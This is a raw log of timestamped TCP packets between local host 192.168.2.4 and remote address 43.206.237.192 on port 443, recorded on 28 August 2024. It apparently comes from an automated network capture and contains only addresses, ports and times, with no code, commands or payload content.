Aug 28, 2024 13:39:02.052707911 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.052721024 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.055639029 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.055644989 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.412760973 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.412827969 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.412832975 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.412873983 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.413021088 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.413029909 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.497617006 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.497688055 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.497693062 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.497733116 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.497891903 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:02.497905970 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:15.810075998 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:15.810094118 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:15.810170889 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:15.810430050 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:15.810440063 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:16.637413025 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:16.637512922 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:16.638005972 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:16.638012886 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:16.639280081 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:16.639285088 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:17.135099888 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:17.135159016 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:17.135215044 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:17.135263920 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:17.135575056 CEST	49750	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:17.135581970 CEST	443	49750	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:31.434950113 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:31.434978008 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:31.435055017 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:31.435246944 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:31.435260057 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:31.572761059 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:31.572772980 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:31.572840929 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:31.573088884 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:31.573101044 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.388886929 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.388909101 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.388976097 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.389018059 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.389472961 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.389477015 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.389993906 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.389997959 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.390799999 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.390804052 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.393618107 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.393624067 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.821850061 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.821933985 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.821940899 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.821984053 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.822432995 CEST	49751	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.822437048 CEST	443	49751	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.823255062 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.823318005 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.823326111 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.823338985 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:32.823367119 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.823388100 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.823715925 CEST	49752	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:32.823723078 CEST	443	49752	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:46.221594095 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:46.221632004 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:46.221719027 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:46.222353935 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:46.222368956 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:47.045598030 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:47.045692921 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:47.046298027 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:47.046304941 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:47.047836065 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:47.047842026 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:47.497339010 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:47.497406006 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:47.497514963 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:47.497514963 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:47.497749090 CEST	49753	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:47.497762918 CEST	443	49753	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:52.857203007 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:52.857237101 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:52.857310057 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:52.857309103 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:52.857342005 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:52.857395887 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:52.857562065 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:52.857577085 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:52.857692957 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:52.857707024 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:53.664959908 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:53.665030956 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:53.665491104 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:53.665499926 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:53.666925907 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:53.666932106 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:53.686532021 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:53.686608076 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:53.687043905 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:53.687052011 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:53.688530922 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:53.688536882 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.110078096 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.110141039 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.110152960 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.110165119 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.110210896 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.110235929 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.110379934 CEST	49754	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.110388994 CEST	443	49754	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.142112970 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.142195940 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:54.142203093 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.142260075 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.142461061 CEST	49755	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:54.142472029 CEST	443	49755	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:00.497952938 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:00.497967958 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:00.498095036 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:00.498395920 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:00.498405933 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:01.280878067 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:01.280941010 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:01.281424999 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:01.281430960 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:01.282605886 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:01.282610893 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:01.711249113 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:01.711313009 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:01.711342096 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:01.711379051 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:01.711613894 CEST	49756	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:01.711622000 CEST	443	49756	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:19.735697031 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:19.735750914 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:19.735827923 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:19.736064911 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:19.736082077 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:20.556066036 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:20.556243896 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:20.556936979 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:20.556947947 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:20.558135986 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:20.558141947 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:20.992276907 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:20.992352962 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:20.992357969 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:20.992398024 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:20.992600918 CEST	49757	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:20.992618084 CEST	443	49757	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:21.122360945 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:21.122414112 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:21.122483969 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:21.122760057 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:21.122778893 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:21.169378042 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:21.169423103 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:21.169503927 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:21.169765949 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:21.169780016 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:22.891752958 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:22.891819954 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:22.892534018 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:22.892544985 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:22.894311905 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:22.894318104 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:22.897874117 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:22.897926092 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:22.898554087 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:22.898570061 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:22.900320053 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:22.900336981 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.334438086 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.334510088 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.334603071 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:23.334755898 CEST	49758	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:23.334779024 CEST	443	49758	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.340621948 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.340681076 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:23.340703964 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.341038942 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.341084003 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:23.341149092 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:23.341159105 CEST	443	49759	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:23.341166019 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:23.341711044 CEST	49759	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.028804064 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.028856039 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:46.028942108 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.029252052 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.029264927 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:46.824866056 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:46.824937105 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.825333118 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.825345993 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:46.826581955 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:46.826586962 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:47.270417929 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:47.270481110 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:47.270484924 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:47.270529032 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:47.270709991 CEST	49760	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:47.270730019 CEST	443	49760	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:52.341614962 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:52.341711998 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:52.341806889 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:52.342034101 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:52.342080116 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:52.356941938 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:52.356966972 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:52.357043982 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:52.357224941 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:52.357239008 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.150129080 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.150260925 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.150907993 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.150917053 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.154577017 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.154582977 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.163218975 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.163297892 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.163666964 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.163670063 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.164743900 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.164755106 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.600370884 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.600444078 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.600451946 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.600513935 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.600739002 CEST	49761	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.600786924 CEST	443	49761	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.610692978 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.610749006 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:40:53.610754013 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.610790014 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.610939026 CEST	49762	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:40:53.610958099 CEST	443	49762	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:07.294702053 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:07.294764996 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:07.294836998 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:07.295113087 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:07.295128107 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:08.091916084 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:08.092010021 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:08.136085987 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:08.136101007 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:08.137770891 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:08.137779951 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:08.536794901 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:08.536848068 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:08.536967039 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:08.537048101 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:08.537689924 CEST	49763	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:08.537703037 CEST	443	49763	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:18.607125998 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:18.607258081 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:18.607364893 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:18.607887983 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:18.607925892 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:18.622384071 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:18.622446060 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:18.622529984 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:18.622920036 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:18.622932911 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.442564964 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.442744017 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.444420099 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.444428921 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.445741892 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.445748091 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.446244955 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.446338892 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.446603060 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.446634054 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.447731972 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.447745085 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.880333900 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.880386114 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.880390882 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.880425930 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.880681038 CEST	49765	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.880698919 CEST	443	49765	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.899460077 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.899518967 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:19.899524927 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.899559975 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.899755955 CEST	49764	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:19.899772882 CEST	443	49764	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:32.576462984 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:32.576500893 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:32.576576948 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:32.577121973 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:32.577132940 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:33.388235092 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:33.388312101 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:33.389719009 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:33.389725924 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:33.390986919 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:33.390991926 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:33.852284908 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:33.852344036 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:33.852520943 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:33.852847099 CEST	49766	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:33.852860928 CEST	443	49766	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:48.914560080 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:48.914664984 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:48.914894104 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:48.915496111 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:48.915529966 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:48.935494900 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:48.935522079 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:48.935597897 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:48.935898066 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:48.935920954 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:49.737180948 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:49.737329006 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:49.738965988 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:49.738987923 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:49.742856979 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:49.742872000 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:49.763701916 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:49.763921022 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:49.764777899 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:49.764792919 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:49.768146992 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:49.768157005 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.192914009 CEST	443	49767	43.206.237.192	192.168.2.4
